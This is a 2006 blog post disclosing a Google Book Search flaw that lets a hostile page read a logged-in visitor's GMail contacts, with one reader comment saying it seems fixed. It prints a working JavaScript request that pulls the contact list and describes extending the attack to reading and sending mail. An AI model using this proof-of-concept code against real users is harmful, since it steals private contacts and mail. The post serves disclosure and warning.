Google Flaw not fixed, GMail contact stealing demo

Despite the flaw being announced a long time ago, the google Book search flaw is still broken. It's surprising that Google aren't taking it more seriously, this one is very easy to use to automate a users GMail account, stealing contacts, or sending email if they are logged into google when they're tricked into visiting such a page. Here's an example that will list your gmail contacts List your gmail contacts There's no reason why a page cannot also send emails, steal the contents emails or anything else. Given the length of time this has been public (I didn't find this flaw, it was posted to bugtraq on the 4th April, or 6 days ago) it's very possible that a worm that stole GMail information is already circulating. Disable script on google.com! The script that gets the contacts is trivial: 
function x() {
	xmlhttp = new XMLHttpRequest();
	xmlhttp.open("GET","http://mail.google.com/mail/?view=page&name=contacts&ver=e0ad439ebad5ad16",false);
	xmlhttp.send('');
	return xmlhttp.responseText;
}
the x function then contains a json structure containing the contacts, this can be easily changed into the output format with some simple regular expressions: see test6.js for those and the complete included script. The livehttpheaders extension in FireFox is how to find out how to do other things.

This entry was posted on Mon Apr 10 19:09:20 UTC+0100 2006 and is filed under Security, Script.

Comments

  1. debian-project mailing list Says:
    Thu Apr 20 13:20:46 UTC+0100 2006 Well, that certainly got my attention. It appears to have been fixed now; or at least, the links Jibbering Jim provides don't work for me. ...